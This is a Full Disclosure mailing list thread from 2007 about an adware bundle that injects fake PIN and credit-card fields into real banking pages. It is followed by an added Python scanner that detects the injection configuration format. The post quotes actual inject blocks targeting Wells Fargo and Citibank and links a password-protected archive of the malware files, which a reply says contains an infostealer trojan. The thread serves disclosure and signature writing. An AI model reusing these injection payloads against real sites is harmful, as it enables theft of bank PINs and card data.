Full Disclosure mailing list archives

Re: Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..
From: "Net Tech" <net.tech11 () gmail com>
Date: Tue, 13 Mar 2007 13:36:10 -0400

Why is this "genius" sending virus infected attachments to the list?
The Trojan Horse Infostealer.Bancos.Z is attached to his "research data"...
it steals passwords and logs keystrokes entered into certain financial Web
sites.



On 3/12/07, Thierry Zoller <Thierry () zoller lu> wrote:

Dear list,

Whoever deals with these people and thinks they are a benign Adware
company (and thus spreads their bundles).

Check this:
Ignoring the fact that they basically install a Rootkit, I attached a
few files I reversed, they install a DLL that does not directly KEYLOG
your banking data, but INJECTS HTML CODE into the _genuine_ (SSLed) Banking
page asking you to enter more details (like PIN, Magic Password etc), then
capture that data and transmit it (I did no further investigation)

http://secdev.zoller.lu/system32.zip
Pass: 123

I am disgusted. They even created their own XML parser for this ...

An extract of HTML code they inject :
-------------------------------------
<inject
url="wellsfargo"
before="name=userid autocomplete='off'></DIV>"
what="
<DIV><LABEL for=userid>ATM PIN</LABEL>:<BR><SPAN class='mozcloak'><INPUT
id=pin  tabIndex=2 maxLength=4 type=password size=4 name=pin
autocomplete='off'></SPAN></DIV>
"
block="alt=Go"
check="pin"
quan="4"
content="d"
>
</inject>
------------------------------------

Attached the main files (pass 123), feel free to add this as HIPS or
whatever signatures, those interested in a complete reversal can contact me
to receive the EXE in question.

I have no more time feel free to dig deeper.


I especially liked this :
------------------------
<inject
url="citibank.com"
<TR><TD colspan=3 class=smallArial noWrap><SPAN STYLE='color:red'>To
prevent fraud enter your credit card information please:</SPAN></TD></TR>


Puke..

--
http://secdev.zoller.lu
Thierry Zoller

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
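
The quoted post invites readers to build signatures from the extract. As an added example (not part of the original thread and not the author's code), this Python scanner searches a byte buffer, such as a dumped DLL or configuration file, for the `<inject ...>` block format shown in the extract and reports the targeted URL string and the attributes present. The function name, the `WINDOW` limit and the sample buffer are assumptions constructed for illustration.

```python
import re

# Attribute names seen in the extract quoted in the post.
KNOWN_ATTRS = ("url", "before", "what", "block", "check", "quan", "content")
# name="value" pairs; values are double-quoted and may span several lines.
ATTR_RE = re.compile(rb'\b([a-z]+)\s*=\s*"([^"]*)"')
TAG_RE = re.compile(rb"<inject\b", re.I)
WINDOW = 4096  # assumed upper bound on the size of one block

# Constructed sample: junk bytes, one complete block, one truncated block.
SAMPLE = (
    b"\x00\x01MZ-junk"
    b'<inject\nurl="bank.example"\nbefore="name=userid>"\nwhat="\n'
    b"<DIV><INPUT id=field1 type=text name=field1></DIV>\n"
    b'"\ncheck="field1"\nquan="4"\ncontent="d"\n>\n</inject>'
    b"\x00\x00"
    b'<inject\nurl="shop.example"\n<TR><TD>constructed text</TD></TR>'
)


def find_inject_blocks(data: bytes):
    """Return one finding per <inject ...> block that carries a url attribute."""
    findings = []
    starts = [m.start() for m in TAG_RE.finditer(data)]
    for i, start in enumerate(starts):
        # A block ends at </inject>, at the next <inject, or at the window limit.
        nxt = starts[i + 1] if i + 1 < len(starts) else len(data)
        limit = min(nxt, start + WINDOW)
        end = data.find(b"</inject>", start, limit)
        body = data[start:end if end != -1 else limit]
        attrs = {k.decode(): v for k, v in ATTR_RE.findall(body)
                 if k.decode() in KNOWN_ATTRS}
        if "url" not in attrs:
            continue  # not the configuration format described in the post
        payload = attrs.get("what", body)
        findings.append({
            "offset": start,
            "url": attrs["url"].decode(errors="replace"),
            "attrs": sorted(attrs),
            "complete": end != -1,  # False for truncated blocks
            "adds_input": re.search(rb"<input\b", payload, re.I) is not None,
        })
    return findings


if __name__ == "__main__":
    for f in find_inject_blocks(SAMPLE):
        print(f)
```

A finding with `complete` set to False corresponds to a block cut off before `</inject>`, like the second extract in the post, and is still reported so that partial dumps are not missed.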
